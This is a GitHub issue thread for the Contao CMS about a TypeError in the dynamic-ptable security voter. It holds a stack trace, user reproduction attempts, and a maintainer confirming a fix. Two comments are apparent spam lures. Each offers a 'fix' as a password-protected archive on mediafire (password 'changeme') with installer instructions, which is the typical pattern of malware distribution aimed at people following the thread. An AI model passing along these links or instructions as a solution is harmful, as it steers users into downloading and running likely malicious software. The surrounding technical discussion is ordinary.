### ISSUE TITLE
Type error in the `AbstractDynamicPtableVoter`

### ISSUE THREAD

**Issue by leofeyer** [contao/contao#7488]
I´m sorry, some element groups works perfectly, but others no longer work for unknown reasons, even with an admin account. here is the error:

`Contao\CoreBundle\Security\Voter\DataContainer\AbstractDynamicPtableVoter::getParentTableAndId(): Return value must be of type array, bool returned`

Stack Trace:
```
TypeError:
Contao\CoreBundle\Security\Voter\DataContainer\AbstractDynamicPtableVoter::getParentTableAndId(): Return value must be of type array, bool returned

  at vendor/contao/core-bundle/src/Security/Voter/DataContainer/AbstractDynamicPtableVoter.php:91
  at Contao\CoreBundle\Security\Voter\DataContainer\AbstractDynamicPtableVoter->getParentTableAndId(1)
     (vendor/contao/core-bundle/src/Security/Voter/DataContainer/AbstractDynamicPtableVoter.php:88)
  at Contao\CoreBundle\Security\Voter\DataContainer\AbstractDynamicPtableVoter->getParentTableAndId(2705)
     (vendor/contao/core-bundle/src/Security/Voter/DataContainer/AbstractDynamicPtableVoter.php:65)
  at Contao\CoreBundle\Security\Voter\DataContainer\AbstractDynamicPtableVoter->hasAccessToParent(object(PostAuthenticationToken), array('pid' => 2705, 'ptable' => 'tl_content'))
     (vendor/contao/core-bundle/src/Security/Voter/DataContainer/AbstractDynamicPtableVoter.php:38)
  at Contao\CoreBundle\Security\Voter\DataContainer\AbstractDynamicPtableVoter->hasAccess(object(PostAuthenticationToken), object(ReadAction))
     (vendor/contao/core-bundle/src/Security/Voter/DataContainer/AbstractDataContainerVoter.php:47)
  at Contao\CoreBundle\Security\Voter\DataContainer\AbstractDataContainerVoter->vote(object(PostAuthenticationToken), object(ReadAction), array('contao_dc.tl_content'))
     (vendor/symfony/security-core/Authorization/Voter/TraceableVoter.php:38)
  at Symfony\Component\Security\Core\Authorization\Voter\TraceableVoter->vote(object(PostAuthenticationToken), object(ReadAction), array('contao_dc.tl_content'))
     (vendor/symfony/security-core/Authorization/AccessDecisionManager.php:70)
  at Symfony\Component\Security\Core\Authorization\AccessDecisionManager->collectResults(object(PostAuthenticationToken), array('contao_dc.tl_content'), object(ReadAction))
     (vendor/symfony/security-core/Authorization/Strategy/PriorityStrategy.php:37)
  at Symfony\Component\Security\Core\Authorization\Strategy\PriorityStrategy->decide(object(Generator))
     (vendor/contao/core-bundle/src/Security/Authentication/ContaoStrategy.php:45)
  at Contao\CoreBundle\Security\Authentication\ContaoStrategy->decide(object(Generator))
     (vendor/symfony/security-core/Authorization/AccessDecisionManager.php:59)
  at Symfony\Component\Security\Core\Authorization\AccessDecisionManager->decide(object(PostAuthenticationToken), array('contao_dc.tl_content'), object(ReadAction), false)
     (vendor/symfony/security-core/Authorization/TraceableAccessDecisionManager.php:60)
  at Symfony\Component\Security\Core\Authorization\TraceableAccessDecisionManager->decide(object(PostAuthenticationToken), array('contao_dc.tl_content'), object(ReadAction))
     (vendor/symfony/security-core/Authorization/AuthorizationChecker.php:48)
  at Symfony\Component\Security\Core\Authorization\AuthorizationChecker->isGranted('contao_dc.tl_content', object(ReadAction))
     (vendor/symfony/security-bundle/Security.php:94)
  at Symfony\Bundle\SecurityBundle\Security->isGranted('contao_dc.tl_content', object(ReadAction))
     (vendor/contao/core-bundle/src/EventListener/DataContainer/DefaultOperationsListener.php:200)
  at Contao\CoreBundle\EventListener\DataContainer\DefaultOperationsListener->Contao\CoreBundle\EventListener\DataContainer\{closure}(object(DataContainerOperation))
     (vendor/contao/core-bundle/contao/classes/DataContainer.php:934)
  at Contao\DataContainer->generateButtons(array('id' => 2705, 'type' => 'cp_grid_start', 'addImage' => 0, 'showPreview' => 0, 'inline' => 0, 'overwriteMeta' => 0, 'fullsize' => 0, 'thead' => 0, 'tfoot' => 0, 'tleft' => 0, 'sortable' => 0, 'target' => 0, 'overwriteLink' => 0, 'useImage' => 0, 'useHomeDir' => 0, 'metaIgnore' => 0, 'splashImage' => 0, 'sliderContinuous' => 0, 'protected' => 0, 'invisible' => 0, 'pid' => 2703, 'ptable' => 'tl_content', 'sorting' => 256, 'tstamp' => 1723645868, 'headline' => 'a:2:{s:4:"unit";s:2:"h2";s:5:"value";s:0:"";}', 'text' => null, 'singleSRC' => null, 'alt' => '', 'imageTitle' => '', 'size' => '', 'imageUrl' => null, 'caption' => '', 'floating' => 'above', 'html' => null, 'unfilteredHtml' => null, 'listtype' => '', 'listitems' => null, 'tableitems' => null, 'summary' => '', 'sortIndex' => 0, 'sortOrder' => 'ascending', 'mooHeadline' => '', 'mooStyle' => '', 'mooClasses' => '', 'highlight' => '', 'markdownSource' => 'sourceText', 'code' => null, 'url' => null, 'titleText' => '', 'linkTitle' => '', 'embed' => '', 'rel' => '', 'multiSRC' => null, 'perRow' => 4, 'perPage' => 0, 'numberOfItems' => 0, 'sortBy' => '', 'galleryTpl' => '', 'customTpl' => '', 'playerSRC' => null, 'youtube' => '', 'vimeo' => '', 'posterSRC' => null, 'playerSize' => '', 'playerOptions' => null, 'playerStart' => '0', 'playerStop' => '0', 'playerCaption' => '', 'playerAspect' => '', 'playerPreload' => '', 'playerColor' => '', 'youtubeOptions' => null, 'vimeoOptions' => null, 'sliderDelay' => 7000, 'sliderSpeed' => 700, 'sliderStartSlide' => 0, 'data' => null, 'cteAlias' => 0, 'articleAlias' => 0, 'article' => 0, 'form' => 0, 'module' => 0, 'groups' => null, 'cssID' => 'a:2:{i:0;s:0:"";i:1;s:0:"";}', 'start' => '', 'stop' => '', 'cp_grid_desktop' => 'grid_50_50', 'cp_grid_tablet' => 'grid_50_50', 'cp_grid_mobile' => 'grid_100', 'cp_grid_valign' => 'items-center', 'cp_grid_halign' => 'justify-items-center', 'rsce_data' => null, 'styleManager' => 'a:5:{s:16:"fcjg_ausrichtung";s:0:"";s:9:"fcjg_grid";s:0:"";s:13:"fcjg_overflow";s:0:"";s:15:"plakart_margins";s:0:"";s:16:"plakart_paddings";s:0:"";}', 'faq' => null, 'picked_news' => null, 'eventArchive' => null, 'eventCount' => 3, 'service' => null, 'mode' => 0, 'iconColor' => '', 'iconPicker' => '', 'closeSections' => 0, 'sectionHeadline' => 'a:2:{s:5:"value";s:0:"";s:4:"unit";s:2:"h2";}', 'sliderSpaceBetween' => 0, 'sliderSlidesPerView' => '1', 'sliderEffect' => 'slide', 'sliderWrapperClass' => '', 'sliderButtons' => '', 'sliderScrollbar' => '', 'sliderPagination' => '', 'sliderPaginationType' => 'bullets', 'sliderBreakpoints' => null, 'sliderAutoheight' => '', 'sliderCenteredSlides' => '', 'sliderCustomOptions' => null, 'stats' => null, 'importantInfos' => null, 'iconWidth' => '', 'logoWidth' => '', 'ticketPrices' => null, 'ticketInfos' => null, 'personName' => '', 'personDescription' => '', 'hosted_button_id' => '', 'accountDetails' => null, 'donateRecipient' => '', 'buttons' => null), 'tl_content', array(), false, null, null, 2708)
     (vendor/contao/core-bundle/contao/drivers/DC_Table.php:4966)
  at Contao\DC_Table->parentView()
     (vendor/contao/core-bundle/contao/drivers/DC_Table.php:468)
  at Contao\DC_Table->showAll()
     (vendor/contao/core-bundle/contao/classes/Backend.php:546)
  at Contao\Backend->getBackendModule('article', null)
     (vendor/contao/core-bundle/contao/controllers/BackendMain.php:144)
  at Contao\BackendMain->run()
     (vendor/contao/core-bundle/src/Controller/BackendController.php:44)
  at Contao\CoreBundle\Controller\BackendController->mainAction()
     (vendor/symfony/http-kernel/HttpKernel.php:181)
  at Symfony\Component\HttpKernel\HttpKernel->handleRaw(object(Request), 1)
     (vendor/symfony/http-kernel/HttpKernel.php:76)
  at Symfony\Component\HttpKernel\HttpKernel->handle(object(Request), 1, true)
     (vendor/symfony/http-kernel/Kernel.php:197)
  at Symfony\Component\HttpKernel\Kernel->handle(object(Request))
     (public/index.php:42)        
```

Database has been updated. 

**Edit 2:** Now the above error also appears in some articles. seems to be in articles that do not have an element group

_Originally posted by @jaynoe in https://github.com/contao/contao/issues/7217#issuecomment-2311972123_

**Comment by leofeyer** [comment]
@jaynoe Can this be reproduced with the [Contao demo](https://github.com/contao/contao-demo)? How many nesting levels are there in your installation?

**Comment by HarbingerOfFire** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by yldzmuhammed** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by jaynoe** [comment]
@leofeyer I cant reproduce the error in the demo. There seems to be everything alright.

I tried something more in my installation:

1. if i duplicate the 'broken' element group in the article, the same error occurs
2. if i create a new element group with another element in the article, the same error occurs
3. if i duplicate the whole article, where the 'broken' element group is in, everything works fine
4. if i want to open an article, where the element group and more nested elements (up to 2 levels) are in, the same error occurs
5. if i duplicate the article, with the above mentioned elements/error, everything works fine

Unfortunately i also can't recognize a pattern for which elements could be the error in the articles.

I can avoid the error by copying the complete page tree ...

**Comment by leofeyer** [comment]
@aschempp Any ideas?

**Comment by denniserdmann** [comment]
I have the same problem in a contao 5.3.13 installation. In my case it's a content-slider with content-image elements inside.

**Comment by Baloobear** [comment]
For additional information: getting back to 5.3.12 solved this issue on my pages.
I faced the problem when I tried to edit an article having only a grouping element containing an image element and a text element.

Maybe this will lead you in some right direction.

**Comment by leofeyer** [comment]
@denniserdmann @Baloobear Can you give me some hints on how to reproduce this with the [Contao Demo Website](https://github.com/contao/contao-demo)?

**Comment by denniserdmann** [comment]
@leofeyer i tried some things, but could not reproduce it in the official demo. 

But time/version seems to be important here. I started my project with contao 5.3.8 and up to 5.3.12 i created and duplicated the article with slider in it, while everything was working fine. Updating to 5.3.13 caused the problem and my solution was to delete the affected articles and create them without duplicating.

So it is hard to reproduce it inside the official demo (without installing and updating).

**Comment by leofeyer** [comment]
@denniserdmann Could you (privately) send me a `mysqldump` of your installation?

**Comment by denniserdmann** [comment]
@leofeyer you've got mail 📧

**Comment by xprojects-de** [comment]
see https://github.com/contao/contao/issues/7217#issuecomment-2346138288

**Comment by leofeyer** [comment]
@denniserdmann Thank you very much, I was able to reproduce the problem with your data. And I‘m pleased to say that the issue has already been fixed in #7513 🎉
